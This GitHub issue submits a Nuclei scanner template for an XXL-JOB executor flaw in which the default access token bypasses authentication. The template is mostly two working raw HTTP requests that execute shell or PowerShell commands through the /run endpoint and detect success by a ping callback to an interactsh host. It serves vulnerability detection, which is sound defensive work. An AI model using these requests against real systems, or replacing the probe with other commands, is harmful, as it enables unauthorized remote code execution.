### ISSUE TITLE
XXL-JOB 默认accessToken 认证绕过漏洞

### ISSUE THREAD

**Issue by k3rwin** [projectdiscovery/nuclei-templates#8523]
### Template Information:
XXL-JOB 默认accessToken 认证绕过漏洞

### Nuclei Template:

```yaml
id: xxl-job-executor-default-token

info:
  name: xxl-job executor use default token
  author: k3rwin
  severity: critical
  description: xxl-job executor default token 9999
  tags: xxl-job,default-token,rce

requests:
  - raw:
        # linux
      - |
        POST /run HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
        Content-Type: application/json
        Xxl-Job-Access-Token: default_token
        Content-Length: 396

        {
          "jobId": {{rand_int(1000)}},
          "executorHandler": "demoJobHandler",
          "executorParams": "demoJobHandler",
          "executorBlockStrategy": "COVER_EARLY",
          "executorTimeout": 0,
          "logId": 1,
          "logDateTime": 1586629003729,
          "glueType": "GLUE_SHELL",
          "glueSource": "ping {{interactsh-url}}",
          "glueUpdatetime": 1586699003758,
          "broadcastIndex": 0,
          "broadcastTotal": 0
        }
        
      # win
      - |
        POST /run HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
        Content-Type: application/json
        Xxl-Job-Access-Token: default_token
        Content-Length: 396

        {
          "jobId": {{rand_int(1000)}},
          "executorHandler": "demoJobHandler",
          "executorParams": "demoJobHandler",
          "executorBlockStrategy": "COVER_EARLY",
          "executorTimeout": 0,
          "logId": 1,
          "logDateTime": 1586629003729,
          "glueType": "GLUE_POWERSHELL",
          "glueSource": "ping {{interactsh-url}}",
          "glueUpdatetime": 1586699003758,
          "broadcastIndex": 0,
          "broadcastTotal": 0
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```
<img width="872" alt="image" src="https://github.com/projectdiscovery/nuclei-templates/assets/59213152/70742abc-ce3b-4930-97c0-e59d28ce3011">
